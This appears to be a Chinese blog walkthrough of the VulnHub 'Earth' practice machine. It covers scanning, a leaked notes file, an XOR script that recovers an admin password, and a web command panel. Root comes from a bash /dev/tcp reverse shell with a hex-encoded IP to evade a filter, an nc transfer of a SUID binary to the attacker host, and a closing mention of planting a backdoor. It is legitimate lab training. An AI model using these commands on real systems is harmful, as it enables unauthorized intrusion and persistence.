• VulnHub-Earth 打靶記錄
  • 知識點
  • 目標探測
  • 資訊收集
  • Shell反彈&資訊二次收集
  • 提權
  • 權限維持

VulnHub-Earth 打靶記錄

搭建靶場的時候一定要使用NATserver或者其他有虛擬網關的網路模式否則無法掃描到埠開放也無法訪問，

知識點

• NMAP引數
  • -sV 獲取系統資訊
  • -sT TCP掃描可能會留下日志記錄
  • -sC 使用默認腳本(在-A模式下不需要)
  • -p1-xxx 掃描埠號 -p- ==>等價于 -p1-65535 不設定埠就掃描默認埠
  • -Pn 繞過禁用ping
  • -A 進攻性掃描也會運行默認腳本）
• arp-scan arp利用arp地址決議協議探測掃描
  • -I 大寫i 用以指定用來掃描的網卡 如果未指定會使用網卡序號最低的一個 也就是eth0但是如果指定 那么指定的網卡必須支持ARP
  • -l 小寫L 表示從網路介面的ip和掩碼生成串列進行掃描
• dirb 目錄掃描 直接dirb https://target.com
  • -i 使用不區分大小寫
  • -l 小寫L 掃描到資訊后本地列印 沒有這個選項

目標探測

1. arp-scan -I eth0 -l #利用arp掃描eth0網卡所在局域網中所有存活的主機
   nmap -sV -Pn -sT -sC 10.0.3.5 如果沒有結果可以嘗試全埠掃描
2. Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local 根據本行資訊發現目標使用了dns決議 只能在本地hosts中寫上決議

資訊收集

1. dirb https://earth.local & dirb https://terratest.earth.local/ 使用dirb掃描web應用目錄 需要注意的是這里掃描要掃描https協議下的因為上一步的nmap掃描出來的應用是443埠也就是https協議所以這里也要用https

2. 在掃描https://terratest.earth.local/時發現該域名下有個robots.txt泄露 進去發現有一個（Disallow: /testingnotes.*） 代表有這個名字的檔案 更換后綴名可以得到后綴txt頁面下有一個說明檔案 其中泄露的資訊 包括管理員用戶名terra 并且第三行泄露了一個用以加密的檔案 以及加密的演算法為XOR

3. 利用python代碼進行異或運算獲取16進制字串 并進行解密

   import base64
   import binascii
   data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
   #data1中的資料為https://earth.local頁面中最下面一行資料的內容 如果不確定是哪個可以都試試 只有這個資料可以異或出來有效資料
   f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
   #(open('a.txt', 'rb') rb引數表示獲取到的是 testdata.txt中內容的16進制 其整體結果為2進制的表現形式，testdata.txt 是上一步掃描獲取到的資訊 可以復制出來 也可以 使用命令：wget https://terratest.earth.local/testdata.txt --no-check-certificate 
   #binascii.b2a_hex 把二進制形式的16進制字串轉換為16進制的形式 
   res=hex(int(data1,16) ^ int(f,16)) #&與 |或 ^異或 ~非 >>右移  <<左移  異或的時候需要知道必須要與加密檔案大小相同
   print(res) #輸出異或運算后的16進制字串
   

4. 將獲取到的16進制字串進行字符轉換(在線解密工具) 分析內容對以下字串進行了多次重復輸出earthclimatechangebad4humans 根據上一步泄露的testingnotes.txt檔案中資訊猜測為密碼

Shell反彈&資訊二次收集

1. 使用收集到的資訊進行后臺登錄（user:terra passwd:earthclimatechangebad4humans）登錄地址為資訊收集頁面發現的admin頁面嘗試登錄網站并成功后發現是一個 命令執行的界面
2. 執行命令find / -name "\*flag\*" 在所有的內容中鎖定user_flag.txt為可疑檔案
   cat 獲取flag
3. cat /var/earth_web/user_flag.txt 獲取檔案內容
   [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

提權

1. 反彈 shell 由于無法用nc反彈成功考慮用bash反彈 發現依舊反彈失敗
   

   經測驗可能過濾了IP嘗試使用十六進制格式的ip地址繞過（其實在/var/earth_web/secure_message/forms.py 中可以發現過濾代碼 ） bash -i >& /dev/tcp/0X0a000304/5566 0>&1 （ 由于過濾了IP的格式改為16進制 轉換地址 )

2. 由于反彈的shell權限不是root，
   嘗試利用命令繼續查找有執行權限的命令 find / -perm -u=s -type f 2>/dev/null

3. 發現有一個reset_root 命令猜測意思是重置root 用strings命令列印檔案中可列印的字符 看了后發現跟沒看一樣 嘗試運行 報錯

4. 用以下命令將檔案上傳到本地環境下
   攻擊機：nc -nlvp 1234 >reset_root
   靶機shell:nc 192.168.43.118 1234 < /usr/bin/reset_root

5. chmod 777 reset_root 給個權限

6. strace reset_root 決議運行看結果（在執行nc -nlvp 1234 >reset_root 命令的目錄下）本地運行 繼續報錯 提示缺少 三個檔案
   

7. 在靶機shell上創建這三個檔案后
   touch /dev/shm/kHgTFI5G touch /dev/shm/Zw7bV9U5 touch/tmp/kcM0Wewe

8. 繼續運行 ./reset_root
   

9. 提示密碼重置為Earth了

10. ------->至此獲得root權限，

權限維持

上傳后門木馬即可獲得權限維持，

標籤：Linux

上一篇：【虛擬機】VMware-Ubuntu-安裝與卸載

下一篇：Ubuntu 18及以上版本配置 IP 的方法，你 get 了嗎？